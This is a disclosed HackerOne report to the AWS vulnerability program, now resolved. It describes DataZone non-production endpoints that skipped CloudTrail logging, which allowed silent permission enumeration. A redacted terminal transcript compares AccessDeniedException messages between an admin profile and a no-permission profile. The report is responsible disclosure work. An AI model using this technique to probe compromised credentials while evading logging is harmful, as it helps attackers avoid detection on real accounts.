(Part 2) Non-Production API Endpoints for the Datazone Service Fail to Log to CloudTrail Resulting in Silent Permission Enumeration

Disclosed: 2025-04-08 16:14:56 By nick_frichette_dd To aws_vdp
Medium
Vulnerability Details
This is a continuation of a [previous report](████████) which is now locked. Hey friends, I'm terribly sorry to do this to you, but just minutes ago I found 3 more endpoints which exhibit the vulnerable behavior. They just came down through my certificate transparency monitoring so I think they were created in the past 24 hours. It is otherwise identical to that previous report. - ██████████ - ████ - █████ ``` █████████ ~ % export AWS_PROFILE=admin █████ ~ % aws datazone list-domains --endpoint-url ███ An error occurred (AccessDeniedException) when calling the ListDomains operation: Invalid endpoint or operation type ██████████ ~ % export AWS_PROFILE=noperm ██████████ ~ % aws datazone list-domains --endpoint-url ██████ An error occurred (AccessDeniedException) when calling the ListDomains operation: User: arn:aws:sts::█████████:assumed-role/noperm/noperm is not authorized to perform: datazone:ListDomains on resource: arn:aws:datazone:us-east-1:████:domain/* ██████████ ~ % export AWS_PROFILE=admin ███████ ~ % aws datazone list-domains --endpoint-url ████ An error occurred (AccessDeniedException) when calling the ListDomains operation: ███ ~ % export AWS_PROFILE=noperm ████ ~ % aws datazone list-domains --endpoint-url ███ An error occurred (AccessDeniedException) when calling the ListDomains operation: User: arn:aws:sts::███████:assumed-role/noperm/noperm is not authorized to perform: datazone:ListDomains on resource: arn:aws:datazone:us-east-1:███████:domain/* ██████ ~ % export AWS_PROFILE=admin █████ ~ % aws datazone list-domains --endpoint-url ████ An error occurred (AccessDeniedException) when calling the ListDomains operation: █████████ ~ % export AWS_PROFILE=noperm ██████ ~ % aws datazone list-domains --endpoint-url ████ An error occurred (AccessDeniedException) when calling the ListDomains operation: User: arn:aws:sts::█████:assumed-role/noperm/noperm is not authorized to perform: datazone:ListDomains on resource: arn:aws:datazone:us-east-1:████:domain/* ``` ## Impact Summary: An adversary can enumerate permissions of compromised credentials for the datazone service without logging to CloudTrail.
Actions
View on HackerOne
Report Stats
  • Report ID: 3014785
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
Share this report